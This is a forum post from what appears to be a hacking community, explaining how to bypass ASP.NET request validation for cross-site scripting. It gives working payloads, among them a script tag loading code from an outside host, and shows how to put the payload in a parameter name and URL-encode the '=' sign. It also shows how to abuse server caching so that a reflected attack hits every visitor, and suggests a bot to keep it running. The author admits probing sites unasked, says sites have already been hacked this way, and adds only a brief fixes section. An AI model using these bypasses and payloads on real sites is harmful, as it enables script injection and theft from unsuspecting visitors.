ASP.NET Request.QueryString XSS Filter Bypass - Convert Reflected XSS to Stored XSS

numaN

Growth Hacker
Staff member
Administrator
Joined
Sep 11, 2019
Messages
15
Points
3
Hi guys! Hope to you are all good.

I was sorfing on the net and visited a website, just tried some payloads (I do this in every website I visit) , and I have discovered some ways to bypass ASP.NET's XSS filtration. I looked at Google but couldnt find a post about how to bypass asp.net xss filtration like my method, it is not known or nobody wrote this before. So, I decided to write this post.

Most of ASPNET apps and websites are effected from this vulnerability. You can use this method in your pentest and bug bounty works. Let us start:

There are some restrictions while you are trying to inject XSS payloads:
  • "A potentially dangerous Request.QueryString value was detected from the client" error
  • Character count limit
  • Special character filtration (like = " < >)
I will show you how you can bypass them and how to convert reflected xss to stored xss technique.

1)- Bypass character count limit:

1.png

I have tried <s> tag and system blocked me but somehow printed the error, so my <s> tag is worked.


Now let me try to write a long text:
2.png

I wrote <s>123456789abcdefghijklmnoprstuvyz123456789abcdefghijklmn but only 20 character is shown.
How to bypass? Let us write the payload as parameter name...


Finally, character count limit is bypassed:
3.png

Now, you can write the loooongest payload, it will work. :cool:

2)- Bypass special character filtration:
You saw that your HTML tags are working, already bypassed character count limit and now you want to run JavaScript in the page. I have specified 2 payloads:
  • <script/src=//15.rs></script>​
  • <script>alert(2);</script>​
(I will use Firefox to run JS, dont want to busy with Chrome XSS Auditor)

Or you can write more... Let us try that our payloads are working or not:

4.png

Didnt work, somehow, system is blocking the run JavaScript, adding " or deleting somethings and so our payload is not working.
(URL: https://******.com/file.aspx?<script/src=//15.rs></script>=<s>)

Let us encode the = sign by URL encoding method.
= : %3D

Visit:
https://******.com/file.aspx?<script/src%3D//15.rs></script>=<s>
5.png

6.PNG



Special character filter & XSS filter has been bypassed...

3)- Convert Reflected XSS to Stored XSS
Yes, it is really possible! :ROFLMAO: I have very surprised when I saw how I did converted RXSS to SXSS.

Somehow, in some ASP.NET websites are caching all queries for 5-10 minutes. For example:
visit here firstly, and then visit:
you will still see results for "TEST" query.

How to do?
1)- Visit your XSS payload embedded page
2)- Visit the page again without payloads, you will see it is cached and printed

7.png

I have visited and got error. No problem, let us visit ErrorPage.aspx file without parameters, now.


8.png


As you can see, it is cached and we have bypassed ASP.NET Request Validation protect and converted it to Stored XSS.
Also, you can visit this website from different devices, it is cached for everybody, not only for your browser.
This cache gets purged automatically in 5-10 minutes, you can write a bot and exploit this vulnerability permanently.
4)- How to avoid from XSS in ASP.NET?

Of course, this method is not valid for all ASP.NET websites, but you had better to apply them:
  • Install Microsoft Anti-XSS library and change your code as:​
from <%= Request.QueryString("parameter") %> to <%= Microsoft.Security.Application.Encoder.HtmlEncode(Request.QueryString("parameter")) %>

  • Disable in-page error printing​
  • Disable caching​

Also, this method it is valid for POST based exploitations too.

Some websites, has been hacked with this method:
(Dont use for illegal purposes!)

Hope to you liked the post, happy hunting. :coffee:
 
Last edited:

numaN

Growth Hacker
Staff member
Administrator
Joined
Sep 11, 2019
Messages
15
Points
3
Still live.
 
Top